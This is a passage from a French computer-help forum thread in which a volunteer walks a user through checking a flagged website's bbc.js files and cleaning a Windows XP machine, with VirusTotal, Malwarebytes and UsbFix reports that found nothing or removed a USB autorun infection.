34. TC: 06/09/2010,22:08:59 | TM: 06/09/2010,22:08:59 | DA: 14/09/2010,21:21:01
35.
36. =========================
37.
38. "c:\Program Files\EasyPHP1-8\www\gites\de\bbc.js" [ ----A---- | 15340 ]
39. TC: 06/09/2010,22:26:48 | TM: 06/09/2010,22:26:48 | DA: 14/09/2010,21:21:19
40.
41. =========================
42.
43. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\sp\bbc.js" [ ----A---- | 15340 ]
44. TC: 14/09/2010,17:28:32 | TM: 06/09/2010,22:23:23 | DA: 14/09/2010,17:29:49
45.
46. =========================
47.
48. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\nl\bbc.js" [ ----A---- | 15340 ]
49. TC: 14/09/2010,17:28:55 | TM: 06/09/2010,22:20:12 | DA: 14/09/2010,17:29:58
50.
51. =========================
52.
53. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\gites\it\bbc.js" [ ----A---- | 15340 ]
54. TC: 14/09/2010,17:30:21 | TM: 06/09/2010,22:16:39 | DA: 14/09/2010,17:30:21
55.
56. =========================
57.
58. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\sp\bbc.js" [ ----A---- | 15340 ]
59. TC: 02/02/2010,00:25:29 | TM: 02/02/2010,00:25:29 | DA: 12/09/2010,23:41:05
60.
61. =========================
62.
63. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\nl\bbc.js" [ ----A---- | 15340 ]
64. TC: 02/02/2010,00:21:17 | TM: 02/02/2010,00:21:17 | DA: 12/09/2010,23:41:00
65.
66. =========================
67.
68. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\it\bbc.js" [ ----A---- | 15340 ]
69. TC: 02/02/2010,00:17:31 | TM: 02/02/2010,00:17:32 | DA: 12/09/2010,23:40:56
70.
71. =========================
72.
73. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\fr\bbc.js" [ ----A---- | 15340 ]
74. TC: 02/02/2010,00:29:07 | TM: 02/02/2010,00:29:08 | DA: 12/09/2010,23:40:52
75.
76. =========================
77.
78. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\en\bbc.js" [ ----A---- | 15340 ]
79. TC: 02/02/2010,00:13:24 | TM: 02/02/2010,00:13:25 | DA: 12/09/2010,23:40:48
80.
81. =========================
82.
83. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU.02.2010\gites\de\bbc.js" [ ----A---- | 15340 ]
84. TC: 02/02/2010,00:09:32 | TM: 02/02/2010,00:09:33 | DA: 12/09/2010,23:40:41
85.
86. =========================
87.
88. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\sp\bbc.js" [ ----A---- | 15340 ]
89. TC: 07/09/2010,08:18:25 | TM: 06/09/2010,22:23:23 | DA: 12/09/2010,23:40:29
90.
91. =========================
92.
93. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\nl\bbc.js" [ ----A---- | 15340 ]
94. TC: 07/09/2010,08:18:51 | TM: 06/09/2010,22:20:12 | DA: 12/09/2010,23:40:20
95.
96. =========================
97.
98. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\it\bbc.js" [ ----A---- | 15340 ]
99. TC: 07/09/2010,08:19:14 | TM: 06/09/2010,22:16:39 | DA: 12/09/2010,23:40:14
100.
101. =========================
102.
103. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\fr\bbc.js" [ ----A---- | 15340 ]
104. TC: 07/09/2010,08:19:44 | TM: 06/09/2010,22:12:28 | DA: 14/09/2010,17:36:00
105.
106. =========================
107.
108. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\en\bbc.js" [ ----A---- | 15340 ]
109. TC: 07/09/2010,08:20:05 | TM: 06/09/2010,22:08:59 | DA: 12/09/2010,23:40:01
110.
111. =========================
112.
113. "z:\PC B.U BU BU BU BU BU BU\B.U INTERNET B.U INTERNET\1 and 1\BU GOOD 09.2010\gites\de\bbc.js" [ ----A---- | 15340 ]
114. TC: 07/09/2010,08:20:26 | TM: 06/09/2010,22:26:48 | DA: 12/09/2010,23:39:58
115.
116. =========================
117.
118. "z:\MAHON\gite\bbc.js" [ ----A---- | 15340 ]
119. TC: 15/09/2010,12:54:55 | TM: 15/09/2010,12:54:56 | DA: 15/09/2010,12:54:56
120.
121. =========================
122.
123. "z:\MAHON\gite\fr\bbc.js" [ ----A---- | 15340 ]
124. TC: 15/09/2010,12:55:36 | TM: 15/09/2010,12:55:37 | DA: 15/09/2010,12:55:37
125.
126. =========================
127.
128. ====== Dossier(s) (TC: Date de création, TM: Date de modification, DA, Dernier accès) ======
129.
130. Aucun dossier trouvé
131.
132.
133. ====== Entrée(s) du registre ======
134.
135. Aucune entrée du registre trouvée
136.
137. =========================
138.
139. Fin à: 14:43:24 le 15/09/2010 ( E.O.F )
1
GWEN
 
Bon..... j'ai rapatrié le site ami "GITE" sur Z: GOOGle dit ceci à propos de lui:

"Sur les 3 pages testées sur ce site au cours des 90 derniers jours, 3 page(s) a (ont) généré le téléchargement et l'installation de programmes malveillants sans l'autorisation de l'internaute. Google a visité ce site pour la dernière fois le 2010-08-25 et un contenu suspect a été détecté sur ce site pour la dernière fois le 2010-08-25.

Le programme malveillant est hébergé sur 1 domaine(s), dont nuttypiano.com/.

This site was hosted on 1 network(s) including AS8560 (SCHLUND)."

Je m'appercois que mon site :"GITES" a des trucs (ligne 93). Je ne sais plus si c'est un BU de mon site GITES en ligne. Aussi vais-je rapatrier mon site en ligne , faire la même analyse et le poster ici. Est-ce OK avec toi?
0
GWEN
 
Voici le rapport de SEAFlog no2 (avec le site "GITE" [ami]et le site "GITES" [le mien] rapatrié sur C:\et Z:\

http://www.cijoint.fr/cjlink.php?file=cj201009/cijJnPSthK.txt

J'espère ne pas être ennuyeux!

Avec reconnaissance :-)
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour , peux tu faire analyser sur virus total !!

Rends toi sur ce site :

https://www.virustotal.com/gui/

Clique sur parcourir et cherche ce fichier : bbc.js

tu suis le chemin : c:\Program Files\EasyPHP1-8\www\gites\sp\bbc.js

Clique sur envoyer le lien.

Un rapport va s'élaborer ligne à ligne.

Attends la fin. Il doit comprendre la taille du fichier envoyé.

Sauvegarde le rapport avec le bloc-note.

Copie le dans ta réponse.

Si VirusTotal indique que le fichier a déjà été analysé, clique sur le bouton Ré-analyse le fichier maintenant.
0
Réponse 10 / 13
Gwen
 
Bonjour Jacques, voici le rapport

File name:
bbc.js
Submission date:
2010-09-19 09:01:45 (UTC)
Current status:
queued (#12) queued analysing finished
Result:
0/ 43 (0.0%)

Additional information
Show all
MD5 : 080104d8cfe13c26112aaed57842a76f
SHA1 : cedf6c30c6e312ce59fa5dc4c10357865f06e9de
SHA256: 032a0bf006addf4bad14c7b89492999d8abbfd4970b82d9eeec0d9d082253508
1
Gwen
 
Même résultats pour les autres langues: fr, de, en, it........
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
ok donc pas infectieux !! je ne vois pas , essais de voir pour repasser malwarebytes avec la clé de ton site connecté tu lui fais faire la mise à jour avant de lancer l'examen complet, mais avant tu purge la restauration système comme cela tu auras un point tout neuf si tu perdais la connection et sans infection dedans

Après une désinfection il est utile de supprimer tous les points de restauration système de façon à ne pas remonter, par mégarde, un point de restauration infecté.

Pour cela, il faut désactiver la restauration système (ce qui aura pour conséquence de supprimer tous les points de restauration existants) puis la réactiver juste après pour que Windows continue à faire des points de sauvegarde réguliers.


Supprimer les anciens points de restauration : System Volume Information\_restore

(1) Désactiver la Restauration du système

cliques sur Démarrer
Cliques droit sur Poste de travail
cliques sur Propriétés
Cliques sur l'onglet Restauration du système
Coches Désactiver la Restauration du système sur tous les lecteurs
Cliques sur Appliquer, Lorsque le message de confirmation apparaît,
cliques sur Oui.
Cliques sur OK.


(2) Activer la Restauration du système


cliques sur Démarrer
Cliques droit sur Poste de travail
cliques sur Propriétés
Cliques sur l'onglet Restauration du système
Décoches Désactiver la Restauration du système sur tous les lecteurs
Cliques sur Appliquer, Lorsque le message de confirmation apparaît,
cliques sur Oui.
Cliques sur OK.





(3) Créer un point de restauration


.cliquer sur démarrer
.cliquer sur tous les programmes
.cliquer sur accessoires
.cliquer sur outils système
.cliquer sur restauration du système
.sur la fenêtre qui s'ouvre cocher créer un point de restauration
.cliquer sur suivant
.dans la fenêtre description du point de restauration lui donner un nom explisitede façon à savoir à quoi il correspond
.cliquer sur céer
.une fois que la page s'affiche avec en haut sur gauche le nom et l'heure de ton point de restauration fermes la fenêtre
0
Réponse 11 / 13
Gwen
 
Bonjour Jacques, voici le rapport:

Malwarebytes' Anti-Malware 1.46
www.malwarebytes.org

Version de la base de données: 4651

Windows 5.1.2600 Service Pack 3
Internet Explorer 8.0.6001.18702

19/09/2010 17:28:57
mbam-log-2010-09-19 (17-28-57).txt

Type d'examen: Examen complet (C:\|E:\|Z:\|)
Elément(s) analysé(s): 281391
Temps écoulé: 1 heure(s), 30 minute(s), 37 seconde(s)

Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0

Processus mémoire infecté(s):
(Aucun élément nuisible détecté)

Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)

Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)

Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)

Dossier(s) infecté(s):
(Aucun élément nuisible détecté)

Fichier(s) infecté(s):
(Aucun élément nuisible détecté)

APPAREMMENT? RIEN N4EST INFECTE§
1
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
effectivement rien trouvé !!
0
Gwen
 
Bonjour Jacques.

Dois-je comprendre que c'est terminé? As-tu des conseils pour optimiser la protection du Pc?

Merci.

Gwen
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, pour moi oui je ne vois plus d'infections !!

pour sécuriser ton pc tu as ton anti-virus bitdéfender est ce un total sécurité , avec pare-feu ?? sinon il faudrait que tu en mettre un plus puissant que celui de windows !! il y en a en gratuit !! sinon en complement de bitdéfender tu conserves malwarebytes tu lui fais faire un examen rapide régulièrement 1 fois semaine , mais toujours après avoir fait faire la mise à jour avant , et puis utilises ccleaner en mode nettoyage le plus souvant possible le mieux serait de le faire à chaque arrêt du pc !! et puis passes le sur le registre après chaque désinstallation de programmes , faire attention au site que tu fréquentes , et les téléchargements !! et aps cliquer sur tous et n'importe quoi !! mais je pense que tu sais déjà cela !!
0
Réponse 12 / 13
gwen
 
UsbFix rapport:

############################## | UsbFix 7.024 | [Suppression]

Utilisateur: Gwen (Administrateur) # GWEN2 [ ]
Mis à jour le 09/09/10 par El Desaparecido / C_XX
Lancé à 10:31:27 | 13/09/2010
Site Web: http://www.teamxscript.org
Contact: FindyKill.Contact@gmail.com

CPU: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
CPU 2: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
Microsoft Windows XP Édition familiale (5.1.2600 32-Bit) # Service Pack 3
Internet Explorer 8.0.6001.18702

Pare-feu Windows: Désactivé /!\
Antivirus: BitDefender Antivirus 13.0.21 [Enabled | Updated]
Firewall: BitDefender Pare-feu 13.0.21 [Enabled]
RAM -> 2046 Mo
C:\ (%systemdrive%) -> Disque fixe # 39 Go (17 Go libre(s) - 43%) [] # NTFS
D:\ -> CD-ROM
E:\ -> Disque amovible # 8 Go (7 Go libre(s) - 92%) [CORSAIR] # FAT32
Z:\ -> Disque fixe # 67 Go (29 Go libre(s) - 44%) [Données] # NTFS

################## | Éléments infectieux |

################## | Registre |

################## | Mountpoints2 |

Supprimé! HKCU\.\.\.\.\Explorer\MountPoints2\{c5c1f6e0-74e9-11de-b42e-001d09a440fe}

################## | Listing |

[12/09/2010 - 22:32:10 | SHD ] C:\$RECYCLE.BIN
[21/11/2009 - 22:31:08 | RHD ] C:\AHCache
[12/09/2010 - 10:55:53 | A | 4] C:\AUTOEXEC.BAT
[10/09/2010 - 21:00:14 | A | 107434] C:\bdlog.txt
[27/12/2009 - 11:12:14 | A | 15078524] C:\BdUninstallTool2009.12.27-10.04.39.log
[27/12/2009 - 11:12:14 | A | 287901] C:\BdUninstallTool2009.12.27-10.04.39.reg
[27/08/2010 - 09:47:51 | RASH | 217] C:\boot.ini
[05/08/2004 - 14:00:00 | RASH | 4952] C:\Bootfont.bin
[09/09/2010 - 20:14:10 | D ] C:\Config.Msi
[20/08/2004 - 12:37:16 | A | 0] C:\CONFIG.SYS
[30/01/2008 - 21:00:34 | D ] C:\dell
[26/01/2008 - 04:40:26 | RAH | 7022] C:\dell.sdr
[07/09/2010 - 14:42:40 | D ] C:\Documents and Settings
[08/05/2007 - 23:49:02 | D ] C:\drivers
[12/09/2010 - 21:50:39 | ASH | 2145579008] C:\hiberfil.sys
[17/10/2009 - 11:50:55 | D ] C:\i386
[24/11/2008 - 14:37:23 | A | 486] C:\IIIIIIIIIIIIIIIIIII MES PHOTOS (2).lnk
[10/07/2010 - 22:24:09 | A | 48224] C:\image1000.jpg
[30/01/2008 - 10:54:52 | A | 4128] C:\INFCACHE.1
[20/08/2004 - 12:37:16 | AH | 0] C:\IO.SYS
[12/09/2010 - 10:25:27 | D ] C:\Kill'em
[12/09/2010 - 09:58:08 | A | 40447] C:\List'em.txt
[20/08/2004 - 12:37:16 | AH | 0] C:\MSDOS.SYS
[05/08/2004 - 14:00:00 | RASH | 47564] C:\NTDETECT.COM
[31/05/2008 - 12:05:18 | RASH | 252240] C:\ntldr
[12/09/2010 - 21:50:33 | ASH | 2145386496] C:\pagefile.sys
[12/09/2010 - 18:19:55 | RD ] C:\Program Files
[13/09/2010 - 10:34:18 | SHD ] C:\RECYCLER
[10/01/2010 - 13:27:59 | D ] C:\SCRIPT COBIAN
[22/07/2010 - 00:48:15 | SHD ] C:\System Volume Information
[07/09/2010 - 14:57:23 | D ] C:\Top-Position
[13/09/2010 - 10:34:21 | D ] C:\UsbFix
[13/09/2010 - 10:34:21 | A | 2805] C:\UsbFix.txt
[29/05/2008 - 14:06:01 | D ] C:\USB_V92
[12/09/2010 - 22:08:58 | D ] C:\WINDOWS
[09/09/2010 - 20:15:10 | A | 190] C:\ZHPExportRegistry-09-09-2010-20-15-10.txt
[11/09/2010 - 22:59:24 | D ] E:\BU GITE
[12/09/2010 - 22:32:12 | SHD ] Z:\$RECYCLE.BIN
[21/07/2010 - 09:46:39 | RD ] Z:\A SHOPPING, infos divers et guides d'achats
[26/08/2010 - 17:20:12 | RD ] Z:\A Tarif POSTE
[01/09/2010 - 21:35:34 | RD ] Z:\aa ALL GESTION
[12/09/2010 - 08:35:15 | RD ] Z:\Anniversaire
[09/09/2010 - 21:41:00 | RD ] Z:\B.U BU BU BU BU BU BU
[06/09/2010 - 19:57:22 | D ] Z:\BANQUE et infos
[11/05/2010 - 20:05:44 | RD ] Z:\CANON
[26/08/2010 - 17:36:13 | RD ] Z:\CHRISTINE
[21/07/2010 - 10:26:38 | D ] Z:\COLUCHE
[11/05/2010 - 12:26:27 | D ] Z:\COMMUNICATION ET WEB
[11/05/2010 - 12:26:28 | D ] Z:\f5e68a0ee944f89528dad021dda0
[20/07/2010 - 21:21:29 | RD ] Z:\from Dell
[12/09/2010 - 22:27:21 | RD ] Z:\FROM WEB
[23/01/2008 - 18:45:08 | A | 29963] Z:\image1000.jpg
[11/05/2010 - 12:29:09 | D ] Z:\LeConjugueur
[09/09/2010 - 21:41:44 | RD ] Z:\LES PASS
[01/07/2010 - 21:04:31 | RD ] Z:\LYCEE AGRICOLE
[13/09/2010 - 10:28:19 | D ] Z:\MES DOCUMENTS SUR Z
[07/02/2008 - 14:47:53 | RHD ] Z:\MSOCache
[11/05/2010 - 13:04:53 | RD ] Z:\MULTIMEDIA MULTIMEDIA MULTIMEDIA
[28/06/2010 - 15:08:45 | D ] Z:\PAROLES CHANSONS
[12/09/2010 - 21:23:07 | RD ] Z:\PC PC PC PC PC OUTILS
[21/07/2010 - 10:34:54 | D ] Z:\PECHE
[11/05/2010 - 13:16:34 | RD ] Z:\Porte-documents D
[13/09/2010 - 10:34:18 | SHD ] Z:\RECYCLER
[07/08/2010 - 19:05:44 | D ] Z:\RELEVES DE COMPTE
[18/01/2009 - 12:56:38 | A | 14747] Z:\Samouraï du Houx.pdf
[22/07/2010 - 10:35:43 | D ] Z:\Stockage outlook
[21/07/2010 - 10:21:48 | D ] Z:\SUCCESSION
[22/07/2010 - 00:48:15 | SHD ] Z:\System Volume Information
[11/05/2010 - 13:16:34 | RD ] Z:\Ttes les dates
[11/05/2010 - 13:16:37 | RD ] Z:\VIDEO

################## | Vaccin |

C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
E:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
Z:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

################## | E.O.F |
0
gwen
 
J'avais oublié de brancher le disk externe, j'ai donc refait tourner UsbFix sur "suppression" et voici le rapport:

############################## | UsbFix 7.024 | [Suppression]

Utilisateur: Gwen (Administrateur) # GWEN2 [ ]
Mis à jour le 09/09/10 par El Desaparecido / C_XX
Lancé à 11:01:36 | 13/09/2010
Site Web: http://www.teamxscript.org
Contact: FindyKill.Contact@gmail.com

CPU: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
CPU 2: Intel(R) Core(TM)2 Duo CPU T5470 @ 1.60GHz
Microsoft Windows XP Édition familiale (5.1.2600 32-Bit) # Service Pack 3
Internet Explorer 8.0.6001.18702

Pare-feu Windows: Désactivé /!\
Antivirus: BitDefender Antivirus 13.0.21 [Enabled | Updated]
Firewall: BitDefender Pare-feu 13.0.21 [Enabled]
RAM -> 2046 Mo
C:\ (%systemdrive%) -> Disque fixe # 39 Go (17 Go libre(s) - 43%) [] # NTFS
D:\ -> CD-ROM
E:\ -> Disque amovible # 8 Go (7 Go libre(s) - 92%) [CORSAIR] # FAT32
F:\ -> Disque fixe # 466 Go (304 Go libre(s) - 65%) [My Book] # FAT32
Z:\ -> Disque fixe # 67 Go (29 Go libre(s) - 44%) [Données] # NTFS

################## | Éléments infectieux |

Supprimé! F:\Autorun.inf
Supprimé! F:\regedit.exe

################## | Registre |


################## | Mountpoints2 |


################## | Listing |

[12/09/2010 - 22:32:10 | SHD ] C:\$RECYCLE.BIN
[21/11/2009 - 22:31:08 | RHD ] C:\AHCache
[12/09/2010 - 10:55:53 | A | 4] C:\AUTOEXEC.BAT
[13/09/2010 - 10:34:28 | RASHD ] C:\Autorun.inf
[27/12/2009 - 11:12:14 | A | 15078524] C:\BdUninstallTool2009.12.27-10.04.39.log
[27/12/2009 - 11:12:14 | A | 287901] C:\BdUninstallTool2009.12.27-10.04.39.reg
[27/08/2010 - 09:47:51 | RASH | 217] C:\boot.ini
[05/08/2004 - 14:00:00 | RASH | 4952] C:\Bootfont.bin
[09/09/2010 - 20:14:10 | D ] C:\Config.Msi
[20/08/2004 - 12:37:16 | A | 0] C:\CONFIG.SYS
[30/01/2008 - 21:00:34 | D ] C:\dell
[26/01/2008 - 04:40:26 | RAH | 7022] C:\dell.sdr
[07/09/2010 - 14:42:40 | D ] C:\Documents and Settings
[08/05/2007 - 23:49:02 | D ] C:\drivers
[12/09/2010 - 21:50:39 | ASH | 2145579008] C:\hiberfil.sys
[17/10/2009 - 11:50:55 | D ] C:\i386
[10/07/2010 - 22:24:09 | A | 48224] C:\image1000.jpg
[30/01/2008 - 10:54:52 | A | 4128] C:\INFCACHE.1
[20/08/2004 - 12:37:16 | AH | 0] C:\IO.SYS
[12/09/2010 - 10:25:27 | D ] C:\Kill'em
[20/08/2004 - 12:37:16 | AH | 0] C:\MSDOS.SYS
[05/08/2004 - 14:00:00 | RASH | 47564] C:\NTDETECT.COM
[31/05/2008 - 12:05:18 | RASH | 252240] C:\ntldr
[12/09/2010 - 21:50:33 | ASH | 2145386496] C:\pagefile.sys
[12/09/2010 - 18:19:55 | RD ] C:\Program Files
[13/09/2010 - 11:06:01 | SHD ] C:\RECYCLER
[10/01/2010 - 13:27:59 | D ] C:\SCRIPT COBIAN
[22/07/2010 - 00:48:15 | SHD ] C:\System Volume Information
[07/09/2010 - 14:57:23 | D ] C:\Top-Position
[13/09/2010 - 11:06:01 | D ] C:\UsbFix
[13/09/2010 - 11:06:02 | A | 2710] C:\UsbFix.txt
[29/05/2008 - 14:06:01 | D ] C:\USB_V92
[12/09/2010 - 22:08:58 | D ] C:\WINDOWS
[11/09/2010 - 22:59:24 | D ] E:\BU GITE
[13/09/2010 - 10:34:54 | RASHD ] E:\Autorun.inf
[21/07/2010 - 02:59:48 | D ] F:\B.U Différenciel
[26/09/2007 - 15:51:18 | D ] F:\autorun
[21/07/2010 - 10:45:24 | D ] F:\Prefetch
[21/07/2010 - 12:39:28 | D ] F:\B.U incrementiel
[10/09/2010 - 14:18:00 | SHD ] F:\FOUND.000
[09/02/2008 - 16:54:22 | SHD ] F:\System Volume Information
[01/01/2010 - 09:34:50 | RD ] F:\TS LES BACK-UP
[09/02/2008 - 18:35:14 | SHD ] F:\Recycled
[27/12/2009 - 11:03:46 | A | 1048576512] F:\COFFREFORT BITDEFENDEUR.bvd
[12/09/2010 - 22:32:12 | SHD ] Z:\$RECYCLE.BIN
[21/07/2010 - 09:46:39 | RD ] Z:\A SHOPPING, infos divers et guides d'achats
[26/08/2010 - 17:20:12 | RD ] Z:\A Tarif POSTE
[01/09/2010 - 21:35:34 | RD ] Z:\aa ALL GESTION
[12/09/2010 - 08:35:15 | RD ] Z:\Anniversaire
[13/09/2010 - 10:34:52 | RASHD ] Z:\Autorun.inf
[09/09/2010 - 21:41:00 | RD ] Z:\B.U BU BU BU BU BU BU
[06/09/2010 - 19:57:22 | D ] Z:\BANQUE et infos
[11/05/2010 - 20:05:44 | RD ] Z:\CANON
[26/08/2010 - 17:36:13 | RD ] Z:\CHRISTINE
[21/07/2010 - 10:26:38 | D ] Z:\COLUCHE
[11/05/2010 - 12:26:27 | D ] Z:\COMMUNICATION ET WEB
[11/05/2010 - 12:26:28 | D ] Z:\f5e68a0ee944f89528dad021dda0
[20/07/2010 - 21:21:29 | RD ] Z:\from Dell
[12/09/2010 - 22:27:21 | RD ] Z:\FROM WEB
[23/01/2008 - 18:45:08 | A | 29963] Z:\image1000.jpg
[11/05/2010 - 12:29:09 | D ] Z:\LeConjugueur
[09/09/2010 - 21:41:44 | RD ] Z:\LES PASS
[01/07/2010 - 21:04:31 | RD ] Z:\LYCEE AGRICOLE
[13/09/2010 - 10:28:19 | D ] Z:\MES DOCUMENTS SUR Z
[07/02/2008 - 14:47:53 | RHD ] Z:\MSOCache
[11/05/2010 - 13:04:53 | RD ] Z:\MULTIMEDIA MULTIMEDIA MULTIMEDIA
[28/06/2010 - 15:08:45 | D ] Z:\PAROLES CHANSONS
[13/09/2010 - 11:00:02 | RD ] Z:\PC PC PC PC PC OUTILS
[21/07/2010 - 10:34:54 | D ] Z:\PECHE
[11/05/2010 - 13:16:34 | RD ] Z:\Porte-documents D
[13/09/2010 - 11:06:01 | SHD ] Z:\RECYCLER
[07/08/2010 - 19:05:44 | D ] Z:\RELEVES DE COMPTE
[18/01/2009 - 12:56:38 | A | 14747] Z:\Samouraï du Houx.pdf
[22/07/2010 - 10:35:43 | D ] Z:\Stockage outlook
[21/07/2010 - 10:21:48 | D ] Z:\SUCCESSION
[22/07/2010 - 00:48:15 | SHD ] Z:\System Volume Information
[11/05/2010 - 13:16:34 | RD ] Z:\Ttes les dates
[11/05/2010 - 13:16:37 | RD ] Z:\VIDEO

################## | Vaccin |

C:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
E:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
F:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)
Z:\Autorun.inf -> Dossier créé par UsbFix (El Desaparecido & C_XX)

################## | Upload |

Veuillez envoyer le fichier: C:\UsbFix_Upload_Me_GWEN2.zip
https://www.ionos.fr/?affiliate_id=77097
Merci de votre contribution.

################## | E.O.F |

Merci!
0
Réponse 13 / 13
gwen
 
Je voudrais dire un grand merci à Jacques qui a été compétant, disponible et serviable... répondant à mes multiples questions..... pour preuve, la longueur de cette page!!!!

Merci encore Jacques pour ton aide si précieuses et tes conseils pour garder le Pc "safe". J'espère que d'autres en profiteront!

En guise de remerciement, nous avons un gîte près du Mt St Michel. Tu seras le bienvenu une semaine pourvu que le gite soit dispo, si possible hors vacances scolaire!

Bien à toi
0
jacques.gache Messages postés 34829 Statut Contributeur sécurité 1 618
 
bonjour, merci pour la proposition @+
0